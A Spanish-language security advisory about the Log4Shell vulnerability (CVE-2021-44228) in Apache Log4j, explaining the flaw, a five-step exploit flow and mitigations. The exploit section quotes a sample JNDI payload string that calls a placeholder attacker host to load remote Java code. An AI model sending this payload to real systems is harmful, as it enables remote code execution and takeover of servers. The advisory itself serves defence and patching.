Novedades

Apache Software Foundation ha lanzado correcciones para contener una vulnerabilidad de día cero explotada activamente que afecta a la ampliamente utilizada biblioteca de registro basada en Java Apache Log4j que podría convertirse en un arma para ejecutar código malicioso y permitir una toma de control completa de los sistemas vulnerables.

Apache Software Foundation ha lanzado correcciones para contener una vulnerabilidad de día cero explotada activamente que afecta a la ampliamente utilizada biblioteca de registro basada en Java Apache Log4j que podría convertirse en un arma para ejecutar código malicioso y permitir una toma de control completa de los sistemas vulnerables.

Rastreado como CVE-2021-44228 y por los apodos Log4Shell o LogJam, el problema se refiere a un caso de ejecución remota de código (RCE) no autenticada en cualquier aplicación que use la utilidad de código abierto y afecte a las versiones Log4j 2.0-beta9 hasta 2.14.1. El error ha obtenido una puntuación perfecta de 10 sobre 10 en el sistema de calificación CVSS, indicativo de la gravedad del problema.

"Un atacante que puede controlar los mensajes de registro o los parámetros de los mensajes de registro puede ejecutar código arbitrario cargado desde los servidores LDAP cuando la sustitución de búsqueda de mensajes está habilitada", dijo la Fundación Apache en un aviso. "Desde Log4j 2.15.0, este comportamiento se ha deshabilitado de forma predeterminada".

Cómo funciona el exploit

1. El atacante envía un parámetro manipulado al servidor (por HTTP u otro protocolo). Por ejemplo, la siguiente cadena: ${jndi:ldap://sitio-malicioso.com/exp}
2. El servidor vulnerable recibe la solicitud con el payload.
3. La vulnerabilidad en Log4j permite que el payload se ejecute y el servidor realiza una petición al sitio del atacante. La petición se realiza a través del protocolo JNDI.
4. La respuesta desde el servidor del atacante contiene un archivo Java remoto (por ejemplo, un archivo exploit.class) que se inyecta en el proceso que está ejecutando el servidor vulnerable.
5. Se ejecuta código en el servidor vulnerable.

RECOMENDACIONES

Por parte de RAN recomendamos actualizar a la versión Log4j 2.15.0, ya que en esta última versión se encuentra corregida la vulnerabilidad. A su vez en las versiones 2.10 o superior, este comportamiento se puede mitigar estableciendo en “true” al iniciar la máquina virtual Java, el parámetro log4j2.formatMsgNoLookups. Para las versiones de 2.0-beta9 a 2.10.0, la mitigación es quitar la clase del classpath: log4j2.formatMsgNoLookupsLOG4J_FORMAT_MSG_NO_LOOKUPStrueJndiLookupzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

FUENTES

• Log4j – Apache Log4j Security Vulnerabilities
• (1) New Messages! (tenable.com)
• #Log4Shell: vulnerabilidad crítica con exploit para #Log4j 2 (PARCHEA YA!) - Actualizado CVE-2021-44228 ~ Segu-Info - Ciberseguridad desde 2000
• Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk (thehackernews.com)